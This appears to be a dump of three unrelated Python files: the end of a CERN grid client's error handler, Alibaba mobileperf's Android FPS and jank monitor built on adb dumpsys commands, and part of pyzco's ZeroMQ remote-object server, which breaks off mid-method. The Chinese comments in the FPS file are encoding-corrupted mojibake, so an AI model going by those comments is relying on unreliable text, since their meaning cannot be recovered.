print_out("Received keyboard intrerupt, exiting..")
sys.exit(1)
except Exception as e:
logging.exception("\n\n>>> EXCEPTION <<<", exc_info = True)
logging.error("\n\n")
print_err(f'''{PrintColor(COLORS.BIRed)}Exception encountered{PrintColor(COLORS.ColorReset)}! it will be logged to {_DEBUG_FILE}
Please report the error and send the log file and "alien.py version" output to Adrian.Sevcenco@cern.ch
If the exception is reproductible including on lxplus, please create a detailed debug report this way:
ALIENPY_DEBUG=1 ALIENPY_DEBUG_FILE=log.txt your_command_line''')
sys.exit(1)
def _cmd(what):
sys.argv = [sys.argv[0]] + [what] + sys.argv[1:]
main()
def cmd_cert_info(): _cmd('cert-info')
def cmd_token_info(): _cmd('token-info')
def cmd_token_destroy(): _cmd('token-destroy')
def cmd_token_init(): _cmd('token-init')
if __name__ == '__main__':
main()
|
fps.py | ๏ปฟ# -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS็ๆงๅจ
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
self.jank_threshold = jank_threshold /1000.0 # ๅ
้จ็ๆถ้ดๆณๆฏ็งไธบๅไฝ
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
# queue ไธๆฅ็บฟ็จ็จ
self.fps_queue = fps_queue
def start(self,start_time):
'''ๆๅผSurfaceStatsCollector
'''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
# ๅฆๆself.focus_window้ๅ
ๅซๅญ็ฌฆ'$'๏ผๅฟ
้กปๅฐๅ
ถ่ฝฌไน
if (self.focus_window.find('$') != -1):
self.focus_window = self.focus_window.replace('$','\$')
except:
logger.warn(u'ๆ ๆณๅจๆ่ทๅๅฝๅActivityๅ็งฐ๏ผไฝฟ็จpage_flip็ป่ฎกๅ
จๅฑๅธง็๏ผ')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
'''็ปๆSurfaceStatsCollector
'''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
'''้่ฟdumpsys window windows่ทๅactivityๅ็งฐ windowๅ?
'''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
ไธๅฐๆๆบ็ฌฌไธๅ ็ฌฌไธๅ ๆฐๅญๅฎๅ
จ็ธๅ
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_results_new(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
ไธๅฐๆๆบ็ฌฌไธๅ ็ฌฌไธๅ ๆฐๅญๅฎๅ
จ็ธๅ
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
elif frame_count == 2 or frame_count ==3 or frame_count==4:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank = self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_jankey_new(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_jankey_new(self,timestamps):
'''ๅๆถๆปก่ถณไธคไธชๆกไปถ่ฎก็ฎไธบไธๆฌกๅก้กฟ๏ผ
โ Display FrameTime>ๅไธๅธงๅนณๅ่ๆถ2ๅใ
โกDisplay FrameTime>ไธคๅธง็ตๅฝฑๅธง่ๆถ (1000ms/24*2โ83.33ms)ใ
'''
twofilmstamp = 83.3 / 1000.0
tempstamp = 0
# ็ป่ฎกไธขๅธงๅก้กฟ
jank = 0
for index,timestamp in enumerate(timestamps):
#ๅ้ขๅๅธงๆ่ถ
่ฟ166ms่ฎก็ฎไธบๅก้กฟ
if (index == 0) or (index == 1) or (index == 2) or (index == 3):
if tempstamp == 0:
tempstamp = timestamp[1]
continue
# ็ปๅถๅธง่ๆถ
costtime = timestamp[1] - tempstamp
# ่ๆถๅคงไบ้ๅผ10ไธชๆถ้ๅจๆ,็จๆท่ฝๆๅๅฐๅก้กฟๆ
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
elif index > 3:
currentstamp = timestamps[index][1]
lastonestamp = timestamps[index - 1][1]
lasttwostamp = timestamps[index - 2][1]
lastthreestamp = timestamps[index - 3][1]
lastfourstamp = timestamps[index - 4][1]
tempframetime = ((lastthreestamp - lastfourstamp) + (lasttwostamp - lastthreestamp) + (
lastonestamp - lasttwostamp)) / 3 * 2
currentframetime = currentstamp - lastonestamp
if (currentframetime > tempframetime) and (currentframetime > twofilmstamp):
jank = jank + 1
return jank
def _calculate_janky(self,timestamps):
tempstamp = 0
#็ป่ฎกไธขๅธงๅก้กฟ
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
#็ปๅถๅธง่ๆถ
costtime = timestamp[1] - tempstamp
#่ๆถๅคงไบ้ๅผ10ไธชๆถ้ๅจๆ,็จๆท่ฝๆๅๅฐๅก้กฟๆ
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
'''ๅค็surfaceflingerๆฐๆฎ
'''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
# fps,jank = self._calculate_results(refresh_period, timestamps)
fps, jank = self._calculate_results_new(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
if not self.fps_queue:#ไธบไบ่ฎฉๅไธช่ๆฌ่ฟ่กๆถไฟๅญๆฐๆฎ
try:
with open(fps_file, 'a+',encoding="utf-8") as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
'''ๆถ้surfaceflingerๆฐๆฎ
็จไบไธค็งๆนๅผ:use_legacy_method ไธบtureๆถ๏ผ้่ฆrootๆ้:
service call SurfaceFlinger 1013 ๅพๅฐๅธงๆฐ
ไธบfalse,dumpsys SurfaceFlinger --latency
Android 8.0 dumpsys SurfaceFlinger ๆฒกๆๅ
ๅฎน
ๅ็จdumpsys gfxinfo package_name framestats
'''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
# activityๅ็ๅๅ๏ผๆง็activityไธๅญๆถ๏ผๅ็ๆถ้ดๆณไธบ็ฉบ๏ผ
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
# ่ฎก็ฎไธ้ๅค็ๅธง
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
# ไธค็งๆ
ๅต๏ผ1๏ผactivityๅ็ๅๅ๏ผไฝๆง็activityไป็ถๅญๆถ๏ผๅ็ๆถ้ดๆณไธไธบ็ฉบ๏ผไฝๆถ้ดๅ
จ้จๅฐไบ็ญไบlast_timestamp
# 2๏ผactivityๆฒกๆๅ็ๅๅ๏ผไนๆฒกๆไปปไฝๅทๆฐ
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window == None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# Google Pixel 2 android8.0 dumpsys SurfaceFlinger --latency็ปๆ
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
# ไฝๅไธบ ่ฃ่9 android8.0 dumpsys SurfaceFlinger --latency็ปๆๆฏๆญฃๅธธ็ ไฝๆฐๆฎๆดๆฐๅพๆ
ข ไนไธ่ฝ็จๆฅ่ฎก็ฎfps
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
# Google Pixel 2 Android8.0 dumpsys SurfaceFlinger --latency window ็ปๆ
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency window_name
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
""" ๅ ไธบๅไปฃ็ ไธญ่ฐ็จ็ umpsys gfxinfo packagename framestats ๅชไฝฟ็จไบ่ทๅapp็fpsๆฐๆฎ๏ผ่ไธไฝฟ็จไบๆธธๆ
่ไธ dumpsys SurfaceFlinger --latency %s'%self.focus_window ่ฟไธชๆไปค็ๅๆฐๆ่ฏฏ
ไนๆฒกๆ่ทๅๅๆฐ็ไปฃ็ ๏ผๅ ๆญค้ๅไบๆธธๆfps็ๆฐๆฎ่ทๅ้จๅไปฃ็
"""
# if self.device.adb.get_sdk_version() >= 26:
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
# results = results.replace("\r\n","\n").splitlines()
# refresh_period = int(results[0]) / nanoseconds_per_second
# results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# # logger.debug(results)
# # ๆdumpsys gfxinfo package_name framestats็็ปๆๅฐ่ฃ
ๆ dumpsys SurfaceFlinger --latency็็ปๆ
# # ๆนไพฟๅ้ข่ฎก็ฎfps jank็ปไธๅค็
# results = results.replace("\r\n","\n").splitlines()
# if not len(results):
# return (None, None)
# isHaveFoundWindow = False
# PROFILEDATA_line = 0
# for line in results:
# if not isHaveFoundWindow:
# if "Window" in line and self.focus_window in line:
# isHaveFoundWindow = True
# # logger.debug("Window line:"+line)
# if not isHaveFoundWindow:
# continue
# if "PROFILEDATA" in line:
# PROFILEDATA_line +=1
# fields = []
# fields = line.split(",")
# if fields and '0' == fields[0]:
# # logger.debug(line)
# # ่ทๅINTENDED_VSYNC VSYNC FRAME_COMPLETEDๆถ้ด ๅฉ็จVSYNC่ฎก็ฎfps jank
# timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
# if timestamp[1] == pending_fence_timestamp:
# continue
# timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
# timestamps.append(timestamp)
# # ๅฆๆๅฐไบไธไธไธช็ชๅฃ๏ผ้ๅบ
# if 2 == PROFILEDATA_line:
# break
# else:
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
# results = results.replace("\r\n","\n").splitlines()
# logger.debug("dumpsys SurfaceFlinger --latency result:")
# logger.debug(results)
# if not len(results):
# return (None, None)
# if not results[0].isdigit():
# return (None, None)
# try:
# refresh_period = int(results[0]) / nanoseconds_per_second
# except Exception as e:
# logger.exception(e)
# return (None, None)
# # If a fence associated with a frame is still pending when we query the
# # latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# # Since we only care about completed frames, we will ignore any timestamps
# # with this value.
# ่ทๅ SurfaceView ็ๆฐๆฎๆ ผๅผ
SurfaceView = self.device.adb.run_shell_cmd(
"dumpsys SurfaceFlinger --list | findstr " + self.focus_window)
# print(SurfaceView)
SurfaceView_info = None
SurfaceView = SurfaceView.replace("\r\n", "\n").splitlines()
# print(SurfaceView)
for line in SurfaceView:
print(line)
if "SurfaceView" in line:
SurfaceView_info = line
# print(line)
print('-------------------')
SurfaceView_name = "\"" + str(SurfaceView_info) + "\""
# if "\n" in SurfaceView_info:
surface_result = SurfaceView_name.replace('\n', '')
print(SurfaceView_name)
print(surface_result)
print('-----------------')
# ่ฟไธชๆไปคๅ้ขๅธฆ็ไธๆฏๅ
ๅๆ่
็ชๅฃๅ๏ผๆฏไปไธ้ขๆไปค่ทๅพ็ๆฐๆฎๆ ทๅผ๏ผ
# SurfaceView - com.hypergryph.arknights/com.u8.sdk.U8UnityContext@e0225d1@0[20991]#0
# ๆฐ็adbๆไปค๏ผๆ่ฆๅผ็จ็ๅฐๆน๏ผ้่ฆๅผ็จไธคๆฌกๆไผ็ๆ, ๅฆ๏ผ adb shell ""abcd""๏ผ่ฟๆฏไธบไปไนๅๅทฅๅ
ทไธ็ๆไปค่ฟๅๅชๆไธ่กๆฐๆฎ๏ผ
results = self.device.adb.run_shell_cmd(
"dumpsys SurfaceFlinger --latency \'" + surface_result + "\'")
# results = self.device.adb.run_shell_cmd(
# 'dumpsys SurfaceFlinger --latency %s' % self.focus_window)
results = results.replace("\r\n", "\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
# ่ฟไธชๅฝไปคๅฏ่ฝ้่ฆroot
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
match = re.search('^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
'''FPS็ๆงๅจ'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
'''ๆ้ ๅจ
:param str device_id: ่ฎพๅคid
:param float frequency: ๅธง็็ป่ฎก้ข็๏ผ้ป่ฎค1็ง
:param int jank_threshold: ่ฎก็ฎjankๅผ็้ๅผ๏ผๅไฝๆฏซ็ง๏ผ้ป่ฎค10ไธชๆถ้ๅจๆ๏ผ166ms
:param bool use_legacy: ๅฝๆๅฎ่ฏฅๅๆฐไธบTrueๆถๆปๆฏไฝฟ็จpage_flip็ป่ฎกๅธง็๏ผๆญคๆถๅๆ ็ๆฏๅ
จๅฑๅ
ๅฎน็ๅทๆฐๅธง็ใ
ๅฝไธๆๅฎ่ฏฅๅๆฐๆถ๏ผๅฏน4.1ไปฅไธ็็ณป็ปๅฐ็ป่ฎกๅฝๅ่ทๅพ็ฆ็น็Activity็ๅทๆฐๅธง็
'''
self.use_legacy = use_legacy
self.frequency = frequency # ๅๆ ท้ข็
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
'''ๅฏๅจFPSMonitorๆฅๅฟ็ๆงๅจ
'''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has start!')
def stop(self):
'''็ปๆFPSMonitorๆฅๅฟ็ๆงๅจ
'''
self.fpscollector.stop()
logger.debug('FPS monitor has stop!')
def save(self):
pass
def parse(self, file_path):
'''่งฃๆ
:param str file_path: ่ฆ่งฃๆๆฐๆฎๆไปถ็่ทฏๅพ
'''
pass
def get_fps_collector(self):
'''่ทๅพfpsๆถ้ๅจ๏ผๆถ้ๅจ้ไฟๅญ็time fps jank็ๅ่กจ
:return: fpsๆถ้ๅจ
:rtype: SurfaceStatsCollector
'''
return self.fpscollector
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
clientserver.py | # -*- coding: utf-8 -*-
"""
pyzco.clientserver
~~~~~~~~~~~~~~~~~~
Implements Client and Server agents.
:copyright: 2013 by Hernan E. Grecco, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import inspect
import threading
import traceback
from collections import defaultdict
from . import LOGGER, launch
from .util import Signal
from .agent import Agent
if sys.version_info < (3, 2):
import futures
else:
from concurrent import futures
HIDE_TRACEBACK = os.environ.get('PZC_HIDE_TRACEBACK', True)
class RemoteAttribute(object):
"""Representing a remote attribute that can handle
callables, container types, descriptors and signals.
:param request: a callable used to send the request to the server, taking to arguments action and payload.
:param name: name of the attribute.
:param signal_manager:
"""
def __init__(self, name, request, signal_manager):
self.name = name
self.request = request
self.signal_manager = signal_manager
def __get__(self, key):
return self.request('exec', {'name': self.name,
'method': '__get__',
'args': (key, )})
def __set__(self, key, value):
return self.request('exec', {'name': self.name,
'method': '__set__',
'args': (key, value)})
def __getitem__(self, key):
return self.request('exec', {'name': self.name,
'method': '__getitem__',
'args': (key,)})
def __setitem__(self, key, value):
return self.request('exec', {'name': self.name,
'method': '__setitem__',
'args': (key, value)})
def __call__(self, *args, **kwargs):
payload = {'name': self.name, 'method': '__call__'}
if args:
payload['args'] = args
if kwargs:
payload['kwargs'] = kwargs
return self.request('exec', payload)
def connect(self, fun):
LOGGER.debug('Connecting {} to {}'.format(self.name, fun))
self.signal_manager('connect', self.name, fun)
def disconnect(self, fun):
self.signal_manager('disconnect', self.name, fun)
def emit(self, value, old_value, other):
self.signal_manager('emit', self.name, (value, old_value, other))
def PSMessage(action, options):
"""Builds a message
"""
return 'PSMessage', action, options
class Server(Agent):
"""Serves an object for remote access from a Proxy. A Server can serve a single object.
:param served_object: object to be served.
.. seealso:: :class:`.Agent`
.. seealso:: :class:`.Proxy`
"""
def __init__(self, served_object, rep_endpoint='tcp://127.0.0.1:0', pub_endpoint='tcp://127.0.0.1:0',
ctx=None, loop=None):
self.served_object = served_object
self.signal_calls = {}
super(Server, self).__init__(rep_endpoint, pub_endpoint, ctx, loop)
def on_request(self, sender, topic, content, msgid):
"""Handles Proxy Server communication, handling attribute access in served_object.
Messages between proxy and server are handled using a tuple
containing three elements: a string 'PSMessage', `action` and `options`.
From Proxy to Server, valid actions are:
- `exec`: execute a method from an attribute served object.
- `getattr`: get an attribute from the served object.
- `setattr`: set an attribute to the served object.
- `get`: get an attribute from the served object, returning a remote object
when necessary.
From Server to Proxy, valid action are:
- `return`: return a value.
- `remote`: return a RemoteAttribute object.
- `raise`: raise an exception.
"""
try:
content_type, action, options = content
if content_type != 'PSMessage':
raise ValueError()
except:
return super(Server, self).on_request(
sender, topic, content, msgid)
try:
if action == 'exec':
attr = getattr(self.served_object, options['name'])
meth = getattr(attr, options['method'])
ret = meth(*options.get('args', ()),
**options.get('kwargs', {}))
elif action == 'getattr':
ret = getattr(self.served_object, options['name'])
elif action == 'setattr':
setattr(self.served_object, options['name'], options['value'])
return PSMessage('return', None)
elif action == 'get':
attr = getattr(self.served_object, options['name'])
if options.get('force_as_object', False) or self.force_as_object(attr):
ret = attr
elif self.return_as_remote(attr):
return PSMessage('remote', None)
else:
ret = attr
elif action == 'inspect':
return PSMessage('return', self.inspect())
elif action == 'instantiate':
if self.served_object is not None:
return PSMessage('raise', (Exception('Cannot instantiate another object.'),
''))
mod_name, class_name = options['class'].rsplit('.', 1)
mod = __import__(mod_name, fromlist=[class_name])
klass = getattr(mod, class_name)
self.served_object = klass(*options['args'], **options['kwargs'])
return PSMessage('return', None)
else:
ret = Exception('invalid message action {}'.format(action))
return PSMessage('raise', (ret, ''))
if isinstance(ret, futures.Future):
ret.add_done_callback(lambda fut: self.publish('__future__',
{'msgid': msgid,
'result': fut.result() if not fut.exception() else None,
'exception': fut.exception()}))
return PSMessage('future_register', msgid)
return PSMessage('return', ret)
except Exception as ex:
exc_type, exc_value, exc_tb = sys.exc_info()
tb = traceback.format_exception(exc_type, exc_value, exc_tb)[1:]
return PSMessage('raise', (ex, tb))
def emit(self, topic, value, old_value, other):
LOGGER.debug('Emitting {}, {}, {}, {}'.format(topic, value, old_value, other))
self.publish(topic, (value, old_value, other))
def on_subscribe(self, topic, count):
try:
signal = getattr(self.served_object, topic)
except AttributeError:
return
if count == 1:
LOGGER.debug('Connecting {} signal on server'.format(topic))
def fun(value, old_value=None, other=None):
LOGGER.debug('ready to emit')
self.emit(topic, value, old_value, other)
self.signal_calls[topic] = fun
signal.connect(self.signal_calls[topic])
def on_unsubscribe(self, topic, count):
try:
signal = getattr(self.served_object, topic)
except AttributeError:
return
if count == 0:
LOGGER.debug('Disconnecting {} signal on server'.format(topic))
signal.disconnect(self.signal_calls[topic])
del self.signal_calls[topic]
@classmethod
def serve_in_thread(cls, served_cls, args, kwargs,
rep_endpoint, pub_endpoint='tcp://127.0.0.1:0'):
t = threading.Thread(target=cls, args=(None, rep_endpoint, pub_endpoint))
t.start()
proxy = Proxy(rep_endpoint)
proxy._proxy_agent.instantiate(served_cls, args, kwargs)
return proxy
@classmethod
def serve_in_process(cls, served_cls, args, kwargs,
rep_endpoint, pub_endpoint='tcp://127.0.0.1:0',
verbose=False, gui=False):
cwd = os.path.dirname(inspect.getfile(served_cls))
launch(cwd, rep_endpoint, pub_endpoint, verbose, gui)
import time
time.sleep(1)
proxy = Proxy(rep_endpoint)
proxy._proxy_agent.instantiate(served_cls, args, kwargs)
return proxy
def serve_forever(self):
self.join()
LOGGER.debug('Server stopped')
def return_as_remote(self, attr):
"""Return True if the object must be returned as a RemoteAttribute.
Override this function to customize your server.
"""
return (hasattr(attr, '__get__') or
hasattr(attr, '__getitem__') or
hasattr(attr, '__setitem__') or
callable(attr) or
(hasattr(attr, 'connect') and hasattr(attr, 'disconnect') and hasattr(attr, 'emit')) )
def force_as_object(self, attr):
"""Return True if the object must be returned as object even if it meets the conditions of a RemoteAttribute.
Override this function to customize your server.
"""
return False
def inspect(self):
"""Inspect the served object and return a tuple containing::
- a set with the attributes that should be returned as RemoteAttribute.
- a set with the attributes that should be returned as Objects.
Override this function to customize your server.
.. seealso: return_as_remote, force_as_object
"""
remotes = set([name for name, value in inspect.getmembers(self.served_object)
if not name.startswith('_') and self.return_as_remote(value)])
objects = set([name for name, value in inspect.getmembers(self.served_object)
if not name.startswith('_') and self.force_as_object(value)])
return remotes, objects
class ProxyAgent(Agent):
"""Helper class that handles Proxy to Server communication.
:param remote_rep_endpoint: REP endpoint of the Server.
"""
def __init__(self, remote_rep_endpoint):
super(ProxyAgent, self).__init__()
self.remote_rep_endpoint = remote_rep_endpoint
ret = self.request(self.remote_rep_endpoint, 'info')
self.remote_pub_endpoint = ret['pub_endpoint']
LOGGER.debug('Started Proxy pointing to REP: {} and PUB: {}'.format(self.remote_rep_endpoint, self.remote_pub_endpoint))
self._signals = defaultdict(Signal)
#: Maps msgid to future object.
self._futures = {}
#: Subscribe to notifications when a future is finished.
self.subscribe(self.remote_rep_endpoint, '__future__',
self.on_future_completed, self.remote_pub_endpoint)
def request_server(self, action, options, force_as_object=False):
"""Sends a request to the associated server using PSMessage
:param action: action to be sent.
:param options: options of the action.
:return:
"""
if force_as_object:
options['force_as_object'] = True
content = self.request(self.remote_rep_endpoint, PSMessage(action, options))
try:
ret_type, ret_action, ret_options = content
if ret_type != 'PSMessage':
raise ValueError
except:
raise ValueError('Invalid response from Server {}'.format(content))
if ret_action == 'raise':
exc, traceback_text = ret_options
exc._pzc_traceback = traceback_text
raise exc
elif ret_action == 'remote':
return RemoteAttribute(options['name'], self.request_server, self.signal_manager)
elif ret_action == 'return':
return ret_options
elif ret_action == 'future_register':
fut = futures.Future()
fut.set_running_or_notify_cancel()
self._futures[ret_options] = fut
return fut
else:
raise ValueError('Unknown {}'.format(ret_action))
def signal_manager(self, action, signal_name, fun):
if action == 'connect':
if not self._signals[(self.remote_rep_endpoint, signal_name)].slots:
self.subscribe(self.remote_rep_endpoint, signal_name, None, self.remote_pub_endpoint)
self._signals[(self.remote_rep_endpoint, signal_name)].connect(fun)
elif action == 'disconnect':
self._signals[(self.remote_rep_endpoint, signal_name)].disconnect(fun)
if not self._signals[(self.remote_rep_endpoint, signal_name)].slots:
self.unsubscribe(self.remote_rep_endpoint, signal_name, self.remote_pub_endpoint)
elif action == 'emit':
#TODO: Emit signal in the server!
pass
else:
raise ValueError(action)
def on_future_completed(self, sender, topic, content, msgid):
fut = self._futures[content['msgid']]
if content['exception']:
